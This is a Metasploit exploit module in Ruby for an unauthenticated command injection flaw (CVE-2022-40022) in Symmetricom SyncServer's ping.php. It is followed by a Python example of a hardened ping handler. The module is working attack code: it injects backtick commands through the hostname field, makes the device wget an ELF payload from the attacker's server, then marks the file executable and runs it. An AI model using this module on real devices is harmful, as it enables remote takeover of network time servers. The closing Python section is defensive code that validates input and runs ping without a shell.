<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::EXE<br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::Remote::HttpServer::HTML<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',<br />        'Description' => %q{<br />          This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.<br />          The S100 through S350 (End of Life) models should be vulnerable to<br />          unauthenticated exploitation due to a session handling vulnerability.<br />          Later models require authentication which is not provided in this module because we can't test it.<br />          The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).<br />          Run 'check' first to determine if vulnerable.<br />          The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT<br />          and LPORT while testing this module.<br />        },<br />        'Author' => [<br />          'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module<br />          'Justin Fatuch Apt4hax', # Exploit PoC<br />          'Robert Bronstein' # Metasploit Module<br />        ],<br />        'References' => [<br />          ['CVE', '2022-40022'],<br />          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']<br />        ],<br />        'DisclosureDate' => '2022-08-31',<br />        'License' => MSF_LICENSE,<br />        'Platform' => 'linux',<br />        'Arch' => [ARCH_X86, ARCH_X64],<br />        'Targets' => [<br />          [ 'Automatic', {} ],<br />        ],<br />        'DefaultTarget' => 0,<br />        'Notes' => {<br />          'Stability' => [ CRASH_SAFE ],<br />          'Reliability' => [ REPEATABLE_SESSION ],<br />          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]<br />        }<br />      )<br />    )<br />    register_options(<br />      [<br />        OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),<br />        OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),<br />        OptInt.new('SRVPORT', [true, 'HTTP Server Port', 4444])<br />      ], self.class<br />    )<br />  end<br /><br />  def primer; end<br /><br />  # Serves the generated ELF payload to the device when it fetches FILENAME.<br />  def on_request_uri(cli, req)<br />    @pl = generate_payload_exe<br />    print_status("#{peer} - Payload request received: #{req.uri}")<br />    send_response(cli, @pl)<br />  end<br /><br />  # The 'hostname' field of the ping form is passed unsanitised to a shell;<br />  # a backtick-wrapped id whose output contains uid=0 confirms the injection.<br />  def check<br />    uri = '/controller/ping.php'<br />    res = send_request_cgi({<br />      'method' => 'POST',<br />      'uri' => uri,<br />      'vars_post' =><br />      {<br />        'currentTab' => 'ping',<br />        'refreshMode' => 'dirty',<br />        'ethDirty' => 'false',<br />        'snmpCfgDirty' => 'false',<br />        'snmpTrapDirty' => 'false',<br />        'pingDirty' => 'true',<br />        'hostname' => "\`id\`",<br />        'port' => 'eth0',<br />        'pingType' => 'ping'<br />      }<br />    })<br />    if res && res.body.to_s =~ /uid=0/<br />      Exploit::CheckCode::Vulnerable<br />    else<br />      Exploit::CheckCode::Safe<br />    end<br />  end<br /><br />  def request(cmd)<br />    uri = '/controller/ping.php'<br />    send_request_cgi({<br />      'method' => 'POST',<br />      'ctype' => 'application/x-www-form-urlencoded',<br />      'uri' => uri,<br />      'vars_post' =><br />      {<br />        'currentTab' => 'ping',<br />        'refreshMode' => 'dirty',<br />        'ethDirty' => 'false',<br />        'snmpCfgDirty' => 'false',<br />        'snmpTrapDirty' => 'false',<br />        'pingDirty' => 'true',<br />        'hostname' => cmd,<br />        'port' => 'eth0',<br />        'pingType' => 'ping'<br />      }<br />    })<br />  end<br /><br />  def exploit<br />    srvhost = datastore['SRVHOST']<br />    srvport = datastore['SRVPORT']<br />    filename = datastore['FILENAME']<br />    resource_uri = '/' + filename<br />    shell_path = '/tmp/'<br />    # ${IFS} stands in for spaces; string interpolation is used so the Integer<br />    # SRVPORT is not concatenated with '+' (which would raise TypeError).<br />    cmds = [<br />      "\`wget${IFS}http://#{srvhost}:#{srvport}/#{filename}${IFS}-O${IFS}#{shell_path}#{filename}\`",<br />      "\`chmod${IFS}700${IFS}#{shell_path}#{filename}\`",<br />      "\`#{shell_path}#{filename}\`"<br />    ]<br />    start_service({<br />      'Uri' => {<br />        'Proc' => proc { |cli, req|<br />          on_request_uri(cli, req)<br />        },<br />        'Path' => resource_uri<br />      }<br />    })<br />    print_status("#{rhost}:#{rport} - Exploit started...")<br />    print_status("#{rhost}:#{rport} - Sending wget command...")<br />    request(cmds[0])<br />    sleep(3)<br />    print_status("#{rhost}:#{rport} - Making payload executable...")<br />    request(cmds[1])<br />    sleep(3)<br />    print_status("#{rhost}:#{rport} - Executing payload...")<br />    request(cmds[2])<br />    sleep(3)<br />  end<br />end<br /></code></pre>
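The defensive counterpart to the ping handler the module targets, as an added example that is not Symmetricom's code: the target is accepted only as an IP literal or a syntactically valid hostname, the interface only from a fixed list, and the command is built as an argv list run without a shell, so backticks, `${IFS}` and similar metacharacters are never interpreted. `is_valid_target`, `build_ping_argv` and `run_ping` are hypothetical names; the `hostname` and `port` fields mirror the form in the module above, and Python stands in for the device's PHP.

```python
"""Hardening the ping-handler pattern behind CVE-2022-40022.

Added example, not Symmetricom's code. /controller/ping.php passes the
'hostname' POST field into a shell, so a value such as `id` runs as a
command. The handler below validates the target as an IP literal or an
RFC 1123 hostname, restricts the interface to an allow-list, and executes
an argv list with shell=False, so no metacharacter is ever interpreted.
"""
import ipaddress
import re
import subprocess

# One DNS label: 1-63 alphanumerics or hyphens, no leading/trailing hyphen.
LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){LABEL}(?:\.{LABEL})*\.?$")
ALLOWED_INTERFACES = ("eth0", "eth1")


def is_valid_target(host: str) -> bool:
    """Accept an IPv4/IPv6 literal or a syntactically valid hostname, nothing else."""
    # ipaddress accepts arbitrary IPv6 scope ids after '%', so refuse them outright.
    if "%" in host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(host) is not None


def build_ping_argv(host: str, interface: str, count: int = 3) -> list:
    """Return the argv for ping, raising ValueError on any untrusted value."""
    if not is_valid_target(host):
        raise ValueError(f"invalid target: {host!r}")
    if interface not in ALLOWED_INTERFACES:
        raise ValueError(f"invalid interface: {interface!r}")
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    # Flags follow Linux iputils ping; '--' ends option parsing so the host
    # can never be read as a flag even if validation were loosened later.
    return ["ping", "-c", str(count), "-I", interface, "--", host]


def run_ping(host: str, interface: str) -> str:
    """Execute with shell=False: each argv element reaches ping verbatim."""
    argv = build_ping_argv(host, interface)
    proc = subprocess.run(argv, capture_output=True, text=True,
                          timeout=30, check=False)
    return proc.stdout
```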